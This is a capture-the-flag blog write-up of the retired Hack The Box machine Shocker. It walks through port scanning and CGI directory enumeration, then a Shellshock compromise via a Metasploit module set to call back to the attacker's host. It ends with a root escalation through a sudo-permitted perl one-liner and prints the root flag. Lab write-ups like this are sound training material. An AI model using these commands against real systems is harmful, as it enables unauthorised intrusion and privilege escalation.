Posted inCTF HTB Retired

Hackthebox Shocker Writeup

April 21, 2020No Comments
Hackthebox Shocker Writeup
Hackthebox Shocker Writeup
Tweet
Share
Share
Pin
0 Shares
1
(1)
Hackthebox Shocker Writeup

Introduction

It is a easy machine from hack the box which has more of enumeration and then finding the right exploit and privilege escalation was very easy .

Steps involved

1-Port Scan
2-Directory Enumeration
3-Checking the  request
4-Exploitaion through metasploit
5-Privilage escalation

Commands involved

1-nmap -sC -sV -O -v -oV 10.10.10.56
2-dirb http://10.10.10.56
3-dirb http://10.10.10.56/cgi-bin -X .sh
4-curl -vvv http://10.10.10.56/cgi-bin/user.sh
5-use exploit/multi/http/apache_mod_cgi_bash_env_exec
6-msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 10.10.10.56
7-msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 10.10.14.20
8-msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/user.sh
9-msf exploit(apache_mod_cgi_bash_env_exec) >run
10-sudo perl -e 'exec "/bin/sh"'

Port Scan

Nmap 7.70 scan initiated Tue Apr 21 07:52:11 2020 as: nmap -sC -sV -O -v -oV 10.10.10.56
 Increasing send delay for 10.10.10.56 from 0 to 5 due to 231 out of 769 dropped probes since last increase.
 Nmap scan report for 10.10.10.56
 Host is up (0.28s latency).
 Not shown: 998 closed ports
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
 | http-methods: 
 |_  Supported Methods: POST OPTIONS GET HEAD
 |http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 TCP/IP fingerprint:
 OS:SCAN(V=7.70%E=4%D=4/21%OT=80%CT=1%CU=34478%PV=Y%DS=2%DC=I%G=Y%TM=5E9EDEB
 OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
 OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
 OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
 OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
 OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
 OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
 OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
 OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
 OS:=S)
 Uptime guess: 202.073 days (since Wed Oct  2 06:08:48 2019)
 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=259 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Tue Apr 21 07:53:21 2020 -- 1 IP address (1 host up) scanned in 71.12 seconds

So let’s visit the website.

Hackthebox Shocker Writeup

Nothing in the source code 

<!DOCTYPE html> <html> <body> <h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> </body> </html>

Directory enumeration

dirb http://10.10.10.56
Hackthebox Shocker Writeup

Found /cgi-bin.

But 404 on it .Let’s run dirb again

root@nagendra:~/Desktop/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh
 
 DIRB v2.22    
 By The Dark Raver
 START_TIME: Tue Apr 21 08:41:43 2020
 URL_BASE: http://10.10.10.56/cgi-bin/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
 
 GENERATED WORDS: 4612                                                          
 ---- Scanning URL: http://10.10.10.56/cgi-bin/ ----

And found user .sh

When curled it i found this –

root@nagendra:~/Desktop/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
 Content-Type: text/plain
 Just an uptime test script
 08:11:17 up 16 min,  0 users,  load average: 0.00, 0.00, 0.00

Checking the request

SO let’s see what the request does.

curl -vvv http://10.10.10.56/cgi-bin/user.sh
Hackthebox Shocker Writeup

Taking some hint from the name of machine.

Exploitaion through metasploit

I found a metasploit exploit against it.

Using metasploit

Hackthebox Shocker Writeup

Got the user flag and the shell.

Hackthebox Shocker Writeup

Privilege escalation

Privilege escalation is easy.

Just sudo -l that’s all.

meterpreter > shell
 Process 1538 created.
 Channel 2 created.
 sudo -l
 Matching Defaults entries for shelly on Shocker:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 User shelly may run the following commands on Shocker:
     (root) NOPASSWD: /usr/bin/perl
 sudo perl 'exec "/bin/sh"'
 Can't open perl script "exec "/bin/sh"": No such file or directory
 sudo perl -e 'exec "/bin/sh"'
 whoami
 root
 cat /root/root.txt
 52c2715605d70c7619030560dc1ca467

How useful was this post?

Click on a star to rate it!

Average rating 1 / 5. Vote count: 1

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 185
Tags:
Last updated on November 12, 2020

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *